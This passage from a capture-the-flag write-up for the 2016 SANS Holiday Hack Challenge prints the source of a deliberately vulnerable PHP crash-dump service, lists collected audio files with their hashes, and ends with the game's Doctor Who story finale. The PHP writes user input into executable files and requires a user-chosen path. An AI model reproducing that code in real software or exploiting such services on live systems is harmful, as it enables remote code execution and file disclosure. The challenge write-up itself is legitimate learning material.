Base64 decoding the output from this gives us the source for the webpage:

<?php 

## Audio file from Discombobulator in webroot: discombobulated-audio-6-XyzE3N9YqKNH.mp3

## Code from http://thisinterestsme.com/receiving-json-post-data-via-php/
## Make sure that it is a POST request.
if(strcasecmp($_SERVER['REQUEST_METHOD'], 'POST') != 0){
    die("Request method must be POST\n");
}
	 
## Make sure that the content type of the POST request has been set to application/json
$contentType = isset($_SERVER["CONTENT_TYPE"]) ? trim($_SERVER["CONTENT_TYPE"]) : '';
if(strcasecmp($contentType, 'application/json') != 0){
    die("Content type must be: application/json\n");
}
	
## Grab the raw POST. Necessary for JSON in particular.
$content = file_get_contents("php://input");
$obj = json_decode($content, true);
	# If json_decode failed, the JSON is invalid.
if(!is_array($obj)){
    die("POST contains invalid JSON!\n");
}

## Process the JSON.
if ( ! isset( $obj['operation']) or (
	$obj['operation'] !== "WriteCrashDump" and
	$obj['operation'] !== "ReadCrashDump"))
	{
	die("Fatal error! JSON key 'operation' must be set to WriteCrashDump or ReadCrashDump.\n");
}
if ( isset($obj['data'])) {
	if ($obj['operation'] === "WriteCrashDump") {
		# Write a new crash dump to disk
		processCrashDump($obj['data']);
	}
	elseif ($obj['operation'] === "ReadCrashDump") {
		# Read a crash dump back from disk
		readCrashdump($obj['data']);
	}
}
else {
	# data key unset
	die("Fatal error! JSON key 'data' must be set.\n");
}
function processCrashdump($crashdump) {
	$basepath = "/var/www/html/docs/";
	$outputfilename = tempnam($basepath, "crashdump-");
	unlink($outputfilename);
	
	$outputfilename = $outputfilename . ".php";
	$basename = basename($outputfilename);
	
	$crashdump_encoded = "<?php print('" . json_encode($crashdump, JSON_PRETTY_PRINT) . "');";
	file_put_contents($outputfilename, $crashdump_encoded);
			
	print <<<END
{
	"success" : true,
	"folder" : "docs",
	"crashdump" : "$basename"
}

END;
}
function readCrashdump($requestedCrashdump) {
	$basepath = "/var/www/html/docs/";
	chdir($basepath);		
	
	if ( ! isset($requestedCrashdump['crashdump'])) {
		die("Fatal error! JSON key 'crashdump' must be set.\n");
	}

	if ( substr(strrchr($requestedCrashdump['crashdump'], "."), 1) === "php" ) {
		die("Fatal error! crashdump value duplicate '.php' extension detected.\n");
	}
	else {
		require($requestedCrashdump['crashdump'] . '.php');
	}	
}

?>

At the top of the source, we see a handy code comment which reveals the location of the audio file, http://ex.northpolewonderland.com/discombobulated-audio-6-XyzE3N9YqKNH.mp3 which we can download using a standard GET request (MD5 sum 4ee86b5b0eef9f8815ee7446272a6c06).

Summary

In total, between the six exploits explored above and the APK embedded resources, we have seven audio files:

filename md5sum
discombobulatedaudio1.mp3 b7aca2f218c39b997bfd61b83856aed2
discombobulatedaudio2.mp3 f05c1ec6c536e455ec686973fa6b8e20
discombobulatedaudio3.mp3 0be15d00299af1a6bc1d11ab6f2696a0
debug-20161224235959-0.mp3 0a5ef5d7a0e89658a833d1892a9e1ec6
discombobulatedaudio5.mp3 3d87c1d31717f81f1966db4133f9e24d
discombobulated-audio-6-XyzE3N9YqKNH.mp3 4ee86b5b0eef9f8815ee7446272a6c06
discombobulatedaudio7.mp3 313e7e370fd7d5232bb569f21856d9f4

See part 5 for their analysis, and to find out who the perpetrator was!

Part 5: Discombobulated Audio

Now that we have all of the discombobulated audio files, it’s time to figure out what they mean. From listening to some of the files, it sounds like there might be some slowed-down speech, so by speeding up the tracks with trial and error using Audacity, and putting them in order of their filenames (with the `debug-…0.mp3 slotting in between file 3 and 5), we end up with a coherent, and familiar, sentence:

"Father Christmas, Santa Claus. Or, as I've always known him, Jeff."
                 ~ The Doctor
                   Doctor Who, A Christmas Carol (2010)

This turns out to be the passphrase for the final door (the one lacking a terminal) in “The Corridor” area of the quest world, and allows us access to The Clock Tower in both the present day and in 1978. Climbing the The Clock Tower the present day, we find none other than the Doctor himself, who admits to kidnapping Santa!

The Doctor explains his reasoning in his epilogue; he wished to take Santa back to 1978 and use his magick to prevent the release of the Star Wars Holiday Special.

<Dr. Who> - The question of the hour is this: Who nabbed Santa.
<Dr. Who> - The answer? Yes, I did.
<Dr. Who> - Next question: Why would anyone in his right mind kidnap Santa Claus?
<Dr. Who> - The answer: Do I look like I'm in my right mind? I'm a madman with a box.
<Dr. Who> - I have looked into the time vortex and I have seen a universe in which the Star Wars Holiday Special was NEVER released. 
            In that universe, 1978 came and went as normal. No one had to endure the misery of watching that abominable blight. 
            People were happy there. It's a better life, I tell you, a better world than the scarred one we endure here.
<Dr. Who> - Give me a world like that. Just once.
<Dr. Who> - So I did what I had to do. 
            I knew that Santa's powerful North Pole Wonderland Magick could prevent the Star Wars Special from being released, 
            if I could leverage that magick with my own abilities back in 1978. 
            But Jeff refused to come with me, insisting on the mad idea that it is better to maintain the integrity of the universe’s timeline. 
            So I had no choice – I had to kidnap him.
<Dr. Who> - It was sort of one of those days.
<Dr. Who> - Well. You know what I mean.
<Dr. Who> - Anyway... Since you interfered with my plan, we'll have to live with the Star Wars Holiday Special in this universe... FOREVER.
            If we attempt to go back again, to cross our own timeline, we'll cause a temporal paradox, a wound in time.
<Dr. Who> - We'll never be rid of it now. The Star Wars Holiday Special will plague this world until time itself ends... 
            All because you foiled my brilliant plan